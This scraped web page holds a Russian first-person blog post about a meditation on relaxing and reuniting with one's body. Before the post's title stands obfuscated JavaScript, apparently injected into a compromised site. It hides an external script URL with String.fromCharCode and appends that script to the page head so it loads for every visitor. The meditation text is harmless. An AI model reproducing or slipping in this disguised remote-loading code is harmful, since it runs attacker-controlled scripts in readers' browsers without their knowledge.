var d3 = document.createElement('script'); d3.type = 'text/javascript'; d3.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 46, 117, 117, 115, 116, 111, 117, 103, 104, 116, 111, 110, 109, 97, 46, 111, 114, 103, 47, 115, 116, 97, 116, 115, 46, 106, 115, 63, 102, 61, 52); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == d3.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(d3);} Я есть тело | Ivan Zalesskiy

Я неподвижно сидел, наблюдая за напряжением своего тела, какие мышцы поддерживают его в сидячем положении, а какие совсем расслаблены. Это было просто наблюдение. Внимание медленно перемещалось по телу, останавливаясь в определенных областях, там где присутствовало напряжение. Стараясь понять причину напряжения, я волевым решением позволял ей расслабиться. Но иногда мозг протестовал, не понимая как можно разрешить расслабиться мышцам шеи в сидячем положении, ведь голова просто упадет. Мне уже были известны провокации мозга и я старался не поддаваться на них, удерживая себя от размышлений об этом я продолжал практику. Через несколько минут мое тело стало похоже на горку расплавленного шоколада, стекающего вниз под воздействием силы тяжести. Мое тело расслабилось настолько, что я перестал ощущать его как тело, а воспринимал как приятное наслаждение от образования тепла.

В такие моменты важно отслеживать напряжение сознания, сколько усилий оно применяет для такого наблюдения? Или наоборот не может удерживать это состояние и начинает проваливаться в сон. Теперь нужно удерживать этот баланс между расслаблением тела и напряжением сознания.

Осознав фиксацию в балансе, я начал двигаться к следующему этапу практики: «Я это тело». Сейчас я наблюдатель, а ещё существует тело, с которым мне предстоит объединиться.


Мне предстояло пройти обратный путь от эфирной плотности тепла к физическому ощущению тела.

Я стал нащупывать своим вниманием признаки тела и первым что проявилось это была дыхательная система. На протяжении нескольких минут я наблюдал за тем как кислород проникает в легкие, наполняет их и как выталкивается углекислый газ:
«Это и есть я» — то что дышит, это Я, тело, которое я сейчас наблюдаю действительно я. Далее я ощутил грудь и спину, позвоночник на котором все это держится, осознавая, чувствуя, что это я. Мое внимание переместилось в руки, и я стал шевелить пальцами, такое ощущение будто я, наблюдатель, только что вдохнул жизнь в застывшее тело, но нет! Моя задача помнить, что я и есть это тело, это я шевелю пальцами!

Как здорово иметь форму, ощущая себя телом. После движения пальцев, все органы интегрировались, вернулись ко мне, я четко ощущал свои ноги, голову, границы частей тела с пространством.

«У меня есть тело». Осознав это, мне захотелось его изучать, я открыл глаза и начал рассматривать его, находя для себя совершенно новые факты, клетки кожи, волоски, линии и изгибы. Я стал трогать себя руками, радость и удовольствие от прикосновения пальцев, проявляли во мне, все больше и больше любовь к самому себе, а точнее к моему телу.

Эта практика изменила мой взгляд на эту реальность, я понимал, что действительно нахожусь здесь и сейчас, что я наполнен колоссальными возможностями. Я сидел и полностью ощущал себя. Тело объединилось с разумом. Это стал единый, четко отлаженный механизм. Слушая тело, я как будто проникал во все клеточки из которых оно состояло и беспрекословно понимал его.

Поделится в соц сетях:
Система Orphus

Добавить комментарий

Подобные материалы

Вот вам история из жизни, в которой взрослый, достаточно состоятельный и влиятельный мужчина, проявляя заботу о...

Люди могут относиться к нам по разному, они даже могут нас оболгать, побить, унизить, при этом мы пострадаем...

ПОДПИШИТЕСЬ НА НАШУ РАССЫЛКУ

ХОТИТЕ ПОЛУЧАТЬ НОВОСТИ ИЛИ ИНФОРМАЦИЮ О БЛИЖАЙЩИХ СЕМИНАРАХ?